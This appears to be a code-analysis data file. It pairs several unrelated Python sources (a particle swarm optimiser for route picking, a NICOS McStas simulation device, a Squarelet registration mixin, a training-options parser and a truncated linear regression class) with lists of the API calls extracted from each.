'apero.io.drs_fits.fix_header', 'drs_fits.fix_header', (['params', 'recipe', 'file_instance'], {}), '(params, recipe, file_instance)\n', (4322, 4353), False, 'from apero.io import drs_fits\n'), ((4618, 4665), 'apero.science.preprocessing.drs_infile_id', 'pp.drs_infile_id', (['params', 'recipe', 'file_instance'], {}), '(params, recipe, file_instance)\n', (4634, 4665), True, 'from apero.science import preprocessing as pp\n'), ((5136, 5157), 'numpy.array', 'np.array', (['infile.data'], {}), '(infile.data)\n', (5144, 5157), True, 'import numpy as np\n'), ((5490, 5515), 'apero.science.preprocessing.drs_outfile_id', 'pp.drs_outfile_id', (['*oargs'], {}), '(*oargs)\n', (5507, 5515), True, 'from apero.science import preprocessing as pp\n'), ((7587, 7631), 'apero.science.preprocessing.quality_control', 'pp.quality_control', (['params', '*qargs'], {'log': '(True)'}), '(params, *qargs, log=True)\n', (7605, 7631), True, 'from apero.science import preprocessing as pp\n'), ((8147, 8183), 'apero.science.preprocessing.correct_top_bottom', 'pp.correct_top_bottom', (['params', 'image'], {}), '(params, image)\n', (8168, 8183), True, 'from apero.science import preprocessing as pp\n'), ((8315, 8356), 'apero.science.preprocessing.median_filter_dark_amps', 'pp.median_filter_dark_amps', (['params', 'image'], {}), '(params, image)\n', (8341, 8356), True, 'from apero.science import preprocessing as pp\n'), ((8462, 8503), 'apero.science.preprocessing.median_one_over_f_noise', 'pp.median_one_over_f_noise', (['params', 'image'], {}), '(params, image)\n', (8488, 8503), True, 'from apero.science import preprocessing as pp\n'), ((8715, 8763), 'apero.io.drs_fits.get_mid_obs_time', 'drs_fits.get_mid_obs_time', (['params', 'infile.header'], {}), '(params, infile.header)\n', (8740, 8763), False, 'from apero.io import drs_fits\n'), ((9066, 9125), 'apero.io.drs_image.rotate_image', 'drs_image.rotate_image', (['image', "params['RAW_TO_PP_ROTATION']"], {}), "(image, params['RAW_TO_PP_ROTATION'])\n", (9088, 9125), False, 'from apero.io import drs_image\n'), ((11006, 11080), 'apero.core.end_main', 'core.end_main', (['params', 'None', 'recipe'], {'success': '(True)', 'outputs': '"""pp"""', 'end': '(False)'}), "(params, None, recipe, success=True, outputs='pp', end=False)\n", (11019, 11080), False, 'from apero import core\n'), ((5838, 5870), 'os.path.exists', 'os.path.exists', (['outfile.filename'], {}), '(outfile.filename)\n', (5852, 5870), False, 'import os\n'), ((6451, 6502), 'apero.science.preprocessing.test_for_corrupt_files', 'pp.test_for_corrupt_files', (['params', 'image', 'hotpixels'], {}), '(params, image, hotpixels)\n', (6476, 6502), True, 'from apero.science import preprocessing as pp\n'), ((7157, 7202), 'apero.science.preprocessing.quality_control', 'pp.quality_control', (['params', '*qargs'], {'log': '(False)'}), '(params, *qargs, log=False)\n', (7175, 7202), True, 'from apero.science import preprocessing as pp\n'), ((6951, 6984), 'numpy.roll', 'np.roll', (['image', '[shiftdy]'], {'axis': '(0)'}), '(image, [shiftdy], axis=0)\n', (6958, 6984), True, 'import numpy as np\n'), ((7009, 7042), 'numpy.roll', 'np.roll', (['image', '[shiftdx]'], {'axis': '(1)'}), '(image, [shiftdx], axis=1)\n', (7016, 7042), True, 'import numpy as np\n')]
|
from typing import Dict, List, Tuple, Union, Callable, Set, cast
import random
import math
import time
def _bra (lst : List[int], beta : float = 0.3) -> int:
"""
The estraction of an item from a list, by using a biased randomisation based
on a quasi-geometric distribution (i.e. f(x) = (1-beta)^x).
:param beta: The parameter of the quasi-geometric.
:return: The estracted element.
"""
return lst[int(math.log(random.random(), 1 - beta)) % len(lst)]
def _triangular (lst : List[int]) -> int:
"""
The estraction of an item from a list, by using a triangular distribution.
:return: The estracted element.
"""
return lst[int(len(lst) - len(lst)*random.random()/2) % len(lst)]
def _make_negative_exp (max_iter : int = 1000, max_v : float = 1.0, min_v : float = 0.5) -> Callable[[int],float]:
"""
This method generates an exponential function used to increase the weight
given to the current position of the particle.
As the number of iterations increase, the particles get more and more static.
***Note*** : Lower is the value of the weight, grater is the relevance given to
the current position of the particles. Hence, for a low weight, the particles are
more static. As the number of iterations without improvement increases, the
mobility of the particles increases too.
:param max_iter: The maximum number of iterations
:param max_v: The maximum value the weight of the current position must assume
:param min_v: The minimum value the weight of the current position must assume
:return: A callable function which represents the exponential needed.
def negative_exp (x : int) -> float
:param x: The current iteration without improvement.
:return: The weight of the current position of the particles.
"""
alpha = math.log(max_v + min_v)/max_iter
def negative_exp (x : int) -> float:
return math.exp(alpha * x) - min_v
return negative_exp
def _negative_exp (x : int, alpha : float) -> float:
"""
This method return the negative exponential according to equation
f(x) = e^(-alpha*x)
:param x: The input.
:param alpha: The parameter of the exponential (the higher is alpha, the
faster is the decrease).
:return: The output f(x).
"""
return math.exp(-alpha*x)
def _compute_distance (lst : List[int], distances : List[List[int]]) -> int:
"""
Given a picking list and a distance matrix, this method calculates the
distance ran to complete the picking list.
:param lst: The picking list
:param distances: The distance matrix
:return: The distance ran.
"""
return sum(distances[lst[i]][lst[i+1]] for i in range(len(lst) - 1)) + distances[lst[-1]][0] + distances[0][lst[0]]
def _two_opt (lst : List[int], i : int, j : int) -> List[int]:
"""
This method, given two cutting positions i and j, makes a 2-Opt on the
starting list.
:param lst: The starting list.
:param i: First cutting point.
:param j: Second cutting point.
:return: The new list.
"""
return lst[:min(i,j)] + list(reversed(lst[min(i,j):max(i,j)])) + lst[max(i,j):]
def _greedy (lst : List[int], distances : List[List[int]]) -> List[int]:
"""
This method returns a purely greedy solution.
:param lst: The list of nodes to visit.
:param distances: The distance matrix.
:return: The nodes in the order in which they should be visited.
"""
c_node = 0; sol : List[int] = []; options = list(lst)
while len(options) > 0:
options = sorted(options, key=lambda i: distances[c_node][i])
c_node = options.pop(0)
sol.append (c_node)
return sol
class Particle (object):
"""
An instance of this class represents a particle used in this algorithm.
"""
def __init__(self, *,
distances : Dict[int, Dict[int,int]],
picking_list : List[int],
paths : Dict[int,Dict[int, Set[int]]],
greediness : float = 0.1,
beta : float = 0.7,
check_paths : float = 0.1,
deepsearch : float = 0.05,
fulldeepsearch : float = 0.5,
max_depth : int = 2500,
) -> None:
'''
:param distances: The distance matrix
:param picking_list: The picking list.
:param paths: The nodes in between two others
:param greediness: The importance given to the greedy solution. To the random intention is given a weigth
equal to (1 - alpha).
:param beta: The parameter of the geometric.
:param check_paths: The probability to include the nodes between node i and j, when going from i to j.
:param deepsearch: Probability to do deep search.
:param fulldeepsearch: Probability to do full deep search.
:param max_depth: Maximum number of iteration in case of deep search
:attr current: The current solution.
:attr intention: The current intention.
:attr pbest: The current personal best found do far.
:attr vcurrent: The cost of the current.
:attr vintention: The cost of the intention.
:attr vpbest: The cost of the personal best.
:attr greedy: The greedy solution.
:attr vgreedy: The cost of the greedy solution.
:attr explorations: The number of solutons explored up to now.
'''
# set parameters
self.distances = dict(distances)
self.picking_list = list(picking_list)
self.paths = dict(paths)
self.greediness = greediness
self.beta = beta
self.check_paths = check_paths
self.deepsearch = deepsearch
self.fulldeepsearch = fulldeepsearch
self.max_depth = max_depth
# starting solutions
self.current = list(picking_list)
random.shuffle(self.current)
self.pbest = list(self.current)
self.intention = list(self.current)
random.shuffle(self.intention)
# evaluate solutions (i.e., distances)
self.vpbest, self.vcurrent, self.vintention = cast(int,float("inf")), 0, 0
self.update_dist ()
# greedy solution
self.greedy = _greedy (picking_list, distances)
self.vgreedy = _compute_distance (self.greedy, distances)
# The number of solutions explored
self.explorations : int = 0
def update_dist (self) -> None:
"""
This method updates the cost of the solutions kept in memory, i.e. current, intention, and pbest.
"""
self.vcurrent, self.vintention = 0, 0
for i in range(len(self.picking_list) - 1):
self.vcurrent += self.distances[self.current[i]][self.current[i+1]]
self.vintention += self.distances[self.intention[i]][self.intention[i+1]]
self.vcurrent += self.distances[0][self.current[0]]
self.vintention += self.distances[0][self.intention[0]]
self.vcurrent += self.distances[self.current[-1]][0]
self.vintention += self.distances[self.intention[-1]][0]
if self.vcurrent < self.vpbest:
self.vpbest, self.pbest = self.vcurrent, list(self.current)
def move (self, gbest : List[int], vgbest : int) -> Tuple[List[int], int]:
"""
This method represents the movement of the particle that explores a new solution.
:param gbest: The global best of the whole swarm.
:param vgbest: The cost of the gbest.
:return: the personal best and its cost.
"""
# Reset the current -> !!! To remove if we want to consider it in the
# construction process.
self.current = []
# Initialize variables used in the construction process
nodes : Set[int] = set(self.picking_list)
c_node : int = 0
n_node : int
options : List[Tuple[int,float]]
# Construct node-by-node a new solution
while len(nodes) > 0:
options = []
if c_node == 0:
options = [(self.intention[0], 1.0 - self.greediness),
(self.greedy[0], self.greediness),
(self.pbest[0], 1.0),
(gbest[0], 1.0)
]
else:
options = [(sol[sol.index(c_node) + 1], w)
for sol, w in ((self.intention, 1.0 - self.greediness), (self.greedy, self.greediness),(self.pbest, 1.0), (gbest, 1.0))
if sol.index(c_node) != len(sol) - 1 and sol[sol.index(c_node) + 1] in nodes]
if len(options) == 0:
n_node = random.choice(list(nodes))
elif len (options) == 1:
n_node = options[0][0]
else:
n_node = _bra (sorted(options, key=lambda i: self.distances[c_node][i[0]]/i[1]), self.beta)[0]
nodes.remove (n_node)
# Eventually include before the new node the nodes on the shortest path
# between the last visited node and the new one.
r = random.random()
if r < self.check_paths:
in_middle = [i for i in nodes if i in self.paths[c_node][n_node]]
while len(in_middle) > 0:
in_middle = sorted (in_middle, key=lambda i: self.distances[c_node][i])
c_node = in_middle.pop(0)
self.current.append (c_node)
nodes.remove (c_node)
# Add the new node to the solution
self.current.append (n_node)
c_node = n_node
# Update the number of solutions explored
self.explorations += 1
# Shuffle the intention
random.shuffle(self.intention)
# Update the personal best if needed, the cost of the current
# and the cost of the new intention
self.update_dist ()
# Eventually do a deepsearch
r = random.random()
if len(self.picking_list) > 3 and r < self.deepsearch:
r2 = random.random ()
if r2 < self.fulldeepsearch:
self.deep_search(list(self.current), full=True)
else:
self.deep_search(list(self.current), full=False)
if self.vcurrent < self.vpbest:
self.pbest, self.vpbest = list(self.current), self.vcurrent
return self.pbest, self.vpbest
def deep_search(self, lst : List[int], full : bool = False, starting_depth : int = 0) -> None:
"""
This method does a deepsearch via 2-Opt in the neighbourhood of the
current solution.
:param lst: The picking list.
:param full: If TRUE every time there is an improvement and the maximum depth has
not been reached the deepsearch goes on.
:param starting_depth: Used in case of full == TRUE to control the depth.
"""
edges = [(i,j) for i in range(0,len(lst)-2) for j in range(i+2,len(lst))]
random.shuffle(edges)
self.explorations += len(edges)
for i, j in edges:
sol = _two_opt (lst, i, j)
cost = _compute_distance (sol, self.distances)
if cost < self.vcurrent:
self.current, self.vcurrent = list(sol), cost
if full is True and starting_depth < self.max_depth:
starting_depth += 1
self.deep_search(sol, True, starting_depth)
class Mattia_PSO:
"""
An instance of this class represents the Particle Swarm Optimization published by <NAME>,
Zammori in 2021.
An Hibrid PSO for TSP
Solution is generated node by node
selecting from four possibilities, namely: current solution, particle best, overall best
and intention; the latter one is a random sequence.
Say that the generated sequence is 1-3-4 and the alternative are:
1-2-3-4-5; 5-4-3-2-1; 3-2-1-5-4; 5-4-1-2-3
so "suggested nodes" are: (5, 3, nan, 1), since 3 is already in, (5,1) remain
choice depends (in a probabilistic way on the corrected distance from 3 to 5 and to 1 to 5
the less the better. Distance is corrected with weigth used to give more importance
to the current solution, then to the best and so on.
This is the basic generation scheme. Solution may be shaked (using a first level or
deep level 2Opt Procedure)
"""
def __init__ (self,*,
distances : Dict[int, Dict[int,int]],
picking_list : List[int],
paths : Dict[int, Dict[int, Set[int]]],
era : int = 10_000,
particles : int = 40,
max_noimp : int = 1000,
print_every : int = 100,
finalsearch : bool = True,
particle_data : Dict[str, Union[int, float, Callable[[int], float], Dict[str,float], Tuple[float,float], List[int], List[List[int]]]]
) -> None:
"""
Initialize.
:param distances: The distance matrix.
:param era: The number of iterations.
:param particles: The number of particles.
:param max_noimp: The maximum number of iterations with no getting any improvement.
:param print_every: The number of iterations between a log and the next one.
:attr history: The history of the best solutions found by the algorithm.
:attr computations: The number of solutions explored before finding the best.
"""
self.era = era
self.max_noimp = max_noimp
self.print_every = print_every
self.finalsearch = finalsearch
particle_data["distances"] = distances
particle_data["picking_list"] = picking_list
particle_data["paths"] = paths
self.particle_data = particle_data
self.swarm : List[Particle] = [Particle(**particle_data) for _ in range(particles)]
self.history : List[int]
self.computations : int = 0
self.computational_time : float = 0.0
def reset(self):
particles = len(self.swarm)
self.swarm = [Particle(**self.particle_data) for _ in range(particles)]
self.history = []
self.computations = 0
def run (self, verbose : bool = False) -> Tuple[List[int], int]:
"""
This is the method to execute the algorithm.
It finally returns the best solution found and its cost.
:return: gbest, vgbest
"""
# Initialize starting time
start = time.time()
# Initilaize the best starting position
gbest : List[int]
vgbest : int = cast(int, float("inf"))
for particle in self.swarm:
if particle.vpbest < vgbest:
gbest, vgbest = list(particle.pbest), particle.vpbest
new_vgbest : int = vgbest
new_gbest : List[int] = list(gbest)
self.history = [vgbest]
# Iterations
noimp = 0
for i in range(self.era):
for particle in self.swarm:
pbest, vpbest = particle.move (gbest, vgbest)
if vpbest < new_vgbest:
new_gbest, new_vgbest = list(pbest), vpbest
if new_vgbest < vgbest:
gbest, vgbest = new_gbest, new_vgbest
noimp = 0
self.computations = sum(p.explorations for p in self.swarm)
else:
noimp += 1
if noimp > self.max_noimp:
break
self.history.append(vgbest)
if i % self.print_every == 0 and verbose is True:
print('Epoch', i, ' Best: ', vgbest)
# Final deepsearch
if self.finalsearch is True:
for particle in self.swarm:
particle.deep_search (list(particle.current), True, 0)
if particle.vcurrent < particle.vpbest:
particle.pbest, particle.vpbest = list(particle.current), particle.vcurrent
if particle.vpbest < vgbest:
gbest, vgbest = list(particle.current), particle.vcurrent
self.computations = sum(p.explorations for p in self.swarm)
# Set computational time
self.computational_time = time.time() - start
return gbest, vgbest
|
[
"math.exp",
"random.shuffle",
"time.time",
"random.random",
"math.log"
] |
[((2424, 2444), 'math.exp', 'math.exp', (['(-alpha * x)'], {}), '(-alpha * x)\n', (2432, 2444), False, 'import math\n'), ((1867, 1890), 'math.log', 'math.log', (['(max_v + min_v)'], {}), '(max_v + min_v)\n', (1875, 1890), False, 'import math\n'), ((6090, 6118), 'random.shuffle', 'random.shuffle', (['self.current'], {}), '(self.current)\n', (6104, 6118), False, 'import random\n'), ((6213, 6243), 'random.shuffle', 'random.shuffle', (['self.intention'], {}), '(self.intention)\n', (6227, 6243), False, 'import random\n'), ((10125, 10155), 'random.shuffle', 'random.shuffle', (['self.intention'], {}), '(self.intention)\n', (10139, 10155), False, 'import random\n'), ((10349, 10364), 'random.random', 'random.random', ([], {}), '()\n', (10362, 10364), False, 'import random\n'), ((11426, 11447), 'random.shuffle', 'random.shuffle', (['edges'], {}), '(edges)\n', (11440, 11447), False, 'import random\n'), ((15085, 15096), 'time.time', 'time.time', ([], {}), '()\n', (15094, 15096), False, 'import time\n'), ((1957, 1976), 'math.exp', 'math.exp', (['(alpha * x)'], {}), '(alpha * x)\n', (1965, 1976), False, 'import math\n'), ((9467, 9482), 'random.random', 'random.random', ([], {}), '()\n', (9480, 9482), False, 'import random\n'), ((10445, 10460), 'random.random', 'random.random', ([], {}), '()\n', (10458, 10460), False, 'import random\n'), ((16866, 16877), 'time.time', 'time.time', ([], {}), '()\n', (16875, 16877), False, 'import time\n'), ((451, 466), 'random.random', 'random.random', ([], {}), '()\n', (464, 466), False, 'import random\n'), ((709, 724), 'random.random', 'random.random', ([], {}), '()\n', (722, 724), False, 'import random\n')]
|
# -*- coding: utf-8 -*-
# *****************************************************************************
# NICOS, the Networked Instrument Control System of the MLZ
# Copyright (c) 2009-2021 by the NICOS contributors (see AUTHORS)
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Module authors:
# <NAME> <<EMAIL>>
#
# *****************************************************************************
"""VTREFF detector image based on McSTAS simulation."""
from nicos.core import Attach, Override, Readable
from nicos.devices.generic import Slit
from nicos.devices.mcstas import McStasSimulation as BaseSimulation
from nicos_mlz.treff.devices import MirrorSample
class McStasSimulation(BaseSimulation):
parameter_overrides = {
'mcstasprog': Override(default='treff_fast'),
}
attached_devices = {
'sample': Attach('Mirror sample', MirrorSample),
's1': Attach('Slit 1', Slit),
's2': Attach('Slit 2', Slit),
'sample_x': Attach('Sample position x', Readable),
'sample_y': Attach('Sample position y', Readable),
'sample_z': Attach('Sample position z', Readable),
'beamstop': Attach('Beam stop positon', Readable),
'omega': Attach('Sample omega rotation', Readable),
'chi': Attach('Sample chi rotation', Readable),
'phi': Attach('Sample phi rotation', Readable),
'detarm': Attach('Position detector arm', Readable),
}
def _prepare_params(self):
params = []
sample = self._attached_sample
params.append('s1_width=%s' % self._attached_s1.width.read(0))
params.append('s1_height=%s' % self._attached_s1.height.read(0))
params.append('s2_width=%s' % self._attached_s2.width.read(0))
params.append('s2_height=%s' % self._attached_s2.height.read(0))
params.append('sample_x=%s' % self._attached_sample_x.read(0))
sample_y = self._attached_sample_y
params.append('sample_y=%s' % (sample_y.read(0) + sample_y.offset +
sample._misalignments['sample_y']))
params.append('sample_z=%s' % self._attached_sample_z.read(0))
params.append('beamstop_pos=%s' % self._attached_beamstop.read(0))
omega = self._attached_omega
params.append('omega=%s' % (
omega.read(0) + omega.offset + sample._misalignments['omega']))
chi = self._attached_chi
params.append('chi=%s' % (
chi.read(0) + chi.offset + sample._misalignments['chi']))
params.append('phi=%s' % self._attached_phi.read(0))
detarm = self._attached_detarm
params.append('detarm=%s' % (
detarm.read(0) + detarm.offset + sample._misalignments['detarm']))
params.append('mirror_length=%s' % self._attached_sample.length)
params.append('mirror_thickness=%s' % self._attached_sample.thickness)
params.append('mirror_height=%s' % self._attached_sample.height)
params.append('mirror_m=%s' % self._attached_sample.m)
params.append('mirror_alfa=%s' % self._attached_sample.alfa)
params.append('mirror_wav=%s' % self._attached_sample.waviness)
if self._attached_sample.rflfile:
params.append('rflfile=%s' %
self._attached_sample.getReflectivityFile())
else:
params.append('rflfile=0')
return params
|
[
"nicos.core.Attach",
"nicos.core.Override"
] |
[((1414, 1444), 'nicos.core.Override', 'Override', ([], {'default': '"""treff_fast"""'}), "(default='treff_fast')\n", (1422, 1444), False, 'from nicos.core import Attach, Override, Readable\n'), ((1496, 1533), 'nicos.core.Attach', 'Attach', (['"""Mirror sample"""', 'MirrorSample'], {}), "('Mirror sample', MirrorSample)\n", (1502, 1533), False, 'from nicos.core import Attach, Override, Readable\n'), ((1549, 1571), 'nicos.core.Attach', 'Attach', (['"""Slit 1"""', 'Slit'], {}), "('Slit 1', Slit)\n", (1555, 1571), False, 'from nicos.core import Attach, Override, Readable\n'), ((1587, 1609), 'nicos.core.Attach', 'Attach', (['"""Slit 2"""', 'Slit'], {}), "('Slit 2', Slit)\n", (1593, 1609), False, 'from nicos.core import Attach, Override, Readable\n'), ((1631, 1668), 'nicos.core.Attach', 'Attach', (['"""Sample position x"""', 'Readable'], {}), "('Sample position x', Readable)\n", (1637, 1668), False, 'from nicos.core import Attach, Override, Readable\n'), ((1690, 1727), 'nicos.core.Attach', 'Attach', (['"""Sample position y"""', 'Readable'], {}), "('Sample position y', Readable)\n", (1696, 1727), False, 'from nicos.core import Attach, Override, Readable\n'), ((1749, 1786), 'nicos.core.Attach', 'Attach', (['"""Sample position z"""', 'Readable'], {}), "('Sample position z', Readable)\n", (1755, 1786), False, 'from nicos.core import Attach, Override, Readable\n'), ((1808, 1845), 'nicos.core.Attach', 'Attach', (['"""Beam stop positon"""', 'Readable'], {}), "('Beam stop positon', Readable)\n", (1814, 1845), False, 'from nicos.core import Attach, Override, Readable\n'), ((1864, 1905), 'nicos.core.Attach', 'Attach', (['"""Sample omega rotation"""', 'Readable'], {}), "('Sample omega rotation', Readable)\n", (1870, 1905), False, 'from nicos.core import Attach, Override, Readable\n'), ((1922, 1961), 'nicos.core.Attach', 'Attach', (['"""Sample chi rotation"""', 'Readable'], {}), "('Sample chi rotation', Readable)\n", (1928, 1961), False, 'from nicos.core import Attach, Override, Readable\n'), ((1978, 2017), 'nicos.core.Attach', 'Attach', (['"""Sample phi rotation"""', 'Readable'], {}), "('Sample phi rotation', Readable)\n", (1984, 2017), False, 'from nicos.core import Attach, Override, Readable\n'), ((2037, 2078), 'nicos.core.Attach', 'Attach', (['"""Position detector arm"""', 'Readable'], {}), "('Position detector arm', Readable)\n", (2043, 2078), False, 'from nicos.core import Attach, Override, Readable\n')]
|
# Django
from django.contrib.auth import login
# Third Party
import requests
# SquareletAuth
from squarelet_auth.users.utils import squarelet_update_or_create
from squarelet_auth.utils import squarelet_post
class MiniregMixin:
"""A mixin to expose miniregister functionality to a view"""
minireg_source = "Default"
field_map = {}
def _create_squarelet_user(self, form, data):
"""Create a corresponding user on squarelet"""
generic_error = (
"Sorry, something went wrong with the user service. "
"Please try again later"
)
try:
resp = squarelet_post("/api/users/", data=data)
except requests.exceptions.RequestException:
form.add_error(None, generic_error)
raise
if resp.status_code / 100 != 2:
try:
error_json = resp.json()
except ValueError:
form.add_error(None, generic_error)
else:
for field, errors in error_json.iteritems():
for error in errors:
form.add_error(self.field_map.get(field, field), error)
finally:
resp.raise_for_status()
return resp.json()
def miniregister(self, form, full_name, email):
"""Create a new user from their full name and email"""
full_name = full_name.strip()
user_json = self._create_squarelet_user(
form, {"name": full_name, "preferred_username": full_name, "email": email}
)
user, _ = squarelet_update_or_create(user_json["uuid"], user_json)
login(self.request, user, backend="squarelet_auth.backends.SquareletBackend")
return user
|
[
"django.contrib.auth.login",
"squarelet_auth.users.utils.squarelet_update_or_create",
"squarelet_auth.utils.squarelet_post"
] |
[((1576, 1632), 'squarelet_auth.users.utils.squarelet_update_or_create', 'squarelet_update_or_create', (["user_json['uuid']", 'user_json'], {}), "(user_json['uuid'], user_json)\n", (1602, 1632), False, 'from squarelet_auth.users.utils import squarelet_update_or_create\n'), ((1641, 1718), 'django.contrib.auth.login', 'login', (['self.request', 'user'], {'backend': '"""squarelet_auth.backends.SquareletBackend"""'}), "(self.request, user, backend='squarelet_auth.backends.SquareletBackend')\n", (1646, 1718), False, 'from django.contrib.auth import login\n'), ((627, 667), 'squarelet_auth.utils.squarelet_post', 'squarelet_post', (['"""/api/users/"""'], {'data': 'data'}), "('/api/users/', data=data)\n", (641, 667), False, 'from squarelet_auth.utils import squarelet_post\n')]
|
import argparse
def opts():
parser = argparse.ArgumentParser(description='Train alexnet on the cub200 dataset',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--data_path_source', type=str, default='',
help='Root of train data set of the source domain')
parser.add_argument('--data_path_source_t', type=str, default='',
help='Root of train data set of the target domain')
parser.add_argument('--data_path_target', type=str, default='',
help='Root of the test data set')
parser.add_argument('--src', type=str, default='amazon',
help='choose between amazon | dslr | webcam')
parser.add_argument('--src_t', type=str, default='webcam',
help='choose between amazon | dslr | webcam')
parser.add_argument('--tar', type=str, default='webcam',
help='choose between amazon | dslr | webcam')
parser.add_argument('--num_classes', type=int, default=31,
help='number of classes of data used to fine-tune the pre-trained model')
# Optimization options
parser.add_argument('--epochs', '-e', type=int, default=200, help='Number of epochs to train')
parser.add_argument('--batch_size', type=int, default=64, help='Batch size of the source data.')
parser.add_argument('--lr', '--learning_rate', type=float, default=0.01, help='The Learning Rate.')
parser.add_argument('--lrw', type=float, default=1.0, help='The Learning Rate.')
parser.add_argument('--momentum', '-m', type=float, default=0.9, help='Momentum.')
parser.add_argument('--weight_decay', '-wd', type=float, default=0.0001, help='Weight decay (L2 penalty).')
parser.add_argument('--schedule', type=str, default='rev', help='rev | constant')
parser.add_argument('--gamma', type=float, default=0.75, help='2.25 (visda) and 0.75 (others).')
# checkpoints
parser.add_argument('--start_epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('--resume', type=str, default='', help='Checkpoints path to resume(default none)')
parser.add_argument('--pretrained_checkpoint', type=str, default='', help='Pretrained checkpoint to resume (default none)')
parser.add_argument('--test_only', '-t', action='store_true', help='Test only flag')
#### graph
parser.add_argument('--dis_gra', type=str, default='l2', help='dis for graph')
parser.add_argument('--cor', type=float, default=1.0, help='cor in the computation of l2 distance')
parser.add_argument('--TopkGraph', action='store_true', help='full graph 2 topk graph')
parser.add_argument('--graphk', type=int, default=10, help='KNN grapg')
parser.add_argument('--AlphaGraph', type=float, default=0.5, help='level for propagation.')
parser.add_argument('--noise_level', type=float, default=0.1, help='cor in the computation of l2 distance')
parser.add_argument('--noise_flag', action='store_true', help='full graph 2 topk graph')
# Architecture
parser.add_argument('--arch', type=str, default='resnet101', help='Model name')
parser.add_argument('--img_process_t', type=str, default='simple', help='Model name')
parser.add_argument('--img_process_s', type=str, default='simple', help='Model name')
parser.add_argument('--flag', type=str, default='original', help='flag for different settings')
parser.add_argument('--type', type=str, default='type1', help='type1 | type2 | type3')
parser.add_argument('--dis', type=str, default='cross_entropy', help='cross_entropy | kl | l1')
parser.add_argument('--pretrained', action='store_true', help='whether using pretrained model')
parser.add_argument('--per_category', type=int, default=4, help='number of domains')
parser.add_argument('--fea_dim', type=int, default=2048, help='feature dim')
parser.add_argument('--uniform_type_s', type=str, default='soft', help='hard | soft | none')
parser.add_argument('--uniform_type_t', type=str, default='soft', help='hard | soft | none')
parser.add_argument('--dsbn', action='store_true', help='whether use domain specific bn')
parser.add_argument('--fixbn', action='store_true', help='whether fix the ImageNet pretrained BN layer')
parser.add_argument('--OurMec', action='store_true', help='whether use our cross entropy style MEC | original mec')
parser.add_argument('--OurPseudo', action='store_true', help='whether use cluster label for cross entropy directly | tangs')
parser.add_argument('--category_mean', action='store_true', help='Only True for visda, acc calculated over categories')
parser.add_argument('--clufrq_dec', action='store_true', help='whether decrease the cluster freq.')
parser.add_argument('--threed', action='store_true', help='ori + aug + grey | ori + grey.')
parser.add_argument('--only_lrw', action='store_true', help='lrw weight | lamda')
parser.add_argument('--niter', type=int, default=500, help='iteration of clustering')
parser.add_argument('--pseudo_type', type=str, default='cluster', help='cluster (spherical_kmeans cluster) or lp (label propagation)')
parser.add_argument('--l2_process', action='store_true', help='')
parser.add_argument('--spherical_kmeans', action='store_true', help='')
parser.add_argument('--entropy_weight', action='store_true', help='whether adopt the prediction entropy of LP prediction as weight')
parser.add_argument('--S4LP', type=str, default='all', help='all | cluster | center')
parser.add_argument('--LPSolver', type=str, default='Itera', help='Itera | CloseF')
parser.add_argument('--LPType', type=str, default='lgc', help='lgc | hmn | parw | omni')
parser.add_argument('--alpha', type=float, default=0.99, help='hyper-parameter.')
parser.add_argument('--lamb', type=float, default=1.0, help='hyper-parameter')
parser.add_argument('--NC4LP', type=int, default=3, help='number of clusters for each category in clustering')
parser.add_argument('--LPIterNum', type=int, default=15, help='number of clusters for each category in clustering')
parser.add_argument('--LPIterationType', type=str, default='add', help='replace | add')
parser.add_argument('--min_num_cate', type=int, default=3, help='lowest number of image in each class')
parser.add_argument('--filter_low', action='store_true', help='filter the samples with low prediction confidence')
parser.add_argument('--cos_threshold', type=float, default=0.05, help='hyper-parameter.')
parser.add_argument('--weight_type', type=str, default='cas_ins', help='replace | add')
parser.add_argument('--graph_gama', type=int, default=1, help='for graph construction, follow manifold-based search')
parser.add_argument('--dis_margin', type=float, default=1.0, help='hyper-parameter.')
parser.add_argument('--moving_weight', type=float, default=0.7, help='hyper-parameter.')
# i/o
parser.add_argument('--log', type=str, default='./checkpoints', help='Log folder')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--test_freq', default=10, type=int,
help='test frequency (default: 1)')
parser.add_argument('--cluster_freq', default=1, type=int,
help='clustering frequency (default: 1)')
parser.add_argument('--print_freq', '-p', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--score_frep', default=300, type=int,
metavar='N', help='print frequency (default: 300, not download score)')
args = parser.parse_args()
args.data_path_source_t = args.data_path_source
args.data_path_target = args.data_path_source
args.src_t = args.tar
args.log = args.log + '_' + args.src + '2' + args.tar + '_' + args.arch + '_' + args.flag + '_' + args.type + '_' + \
args.dis + '_' + args.uniform_type_s + '_' + args.pseudo_type + str(args.lrw) + '_' + str(args.cos_threshold) + args.dis_gra
return args
|
[
"argparse.ArgumentParser"
] |
[((43, 177), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Train alexnet on the cub200 dataset"""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description='Train alexnet on the cub200 dataset',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n", (66, 177), False, 'import argparse\n')]
|
#%%
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets, linear_model, metrics, preprocessing
from sklearn.model_selection import train_test_split
import itertools
import typing
class LinearRegression():
def __init__(self, n_features, optimiser):
np.random.seed(2)
self.w = np.random.randn(n_features)
self.b = np.random.randn()
self.optimiser = optimiser
def fit(self, X, y):
'''
Fit model to data
'''
losses = []
for epoch in range(self.optimiser.epochs):
y_pred = self.predict(X)
new_w, new_b = self.optimiser.step(self.w, self.b, X, y_pred, y)
self._update_params(new_w, new_b)
losses.append(LinearRegression.mse_loss(y_pred, y))
LinearRegression.plot_loss(losses)
print('Final cost:', losses[-1])
print('Weight values:', self.w)
print('Bias values:', self.b)
def predict(self, X):
'''
Calculate prediction
'''
y_pred = np.dot(X, self.w) + self.b
return y_pred
@staticmethod
